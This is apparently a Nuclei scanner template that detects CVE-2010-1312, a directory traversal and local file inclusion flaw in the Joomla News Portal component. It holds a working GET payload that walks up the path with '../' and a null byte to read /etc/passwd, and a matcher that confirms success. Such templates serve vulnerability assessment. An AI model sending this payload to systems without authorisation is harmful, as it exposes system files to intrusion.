41 lines
1.5 KiB
YAML
41 lines
1.5 KiB
YAML
id: CVE-2010-1312
|
|
|
|
info:
|
|
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/12077
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-1312
|
|
- http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2010-1312
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01155
|
|
epss-percentile: 0.83238
|
|
cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: ijoomla
|
|
product: com_news_portal
|
|
tags: cve,cve2010,joomla,lfi,edb,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402202576b69ba6c664341369030f571794ac8296f47cd274225ef3cd56f90cb42f34022071a6c15ea50c9a3ce7af1239dc675c67fe69b4d60b54ae9c8364c52e632b0e7b:922c64590222798bb761d5b6d8e72950 |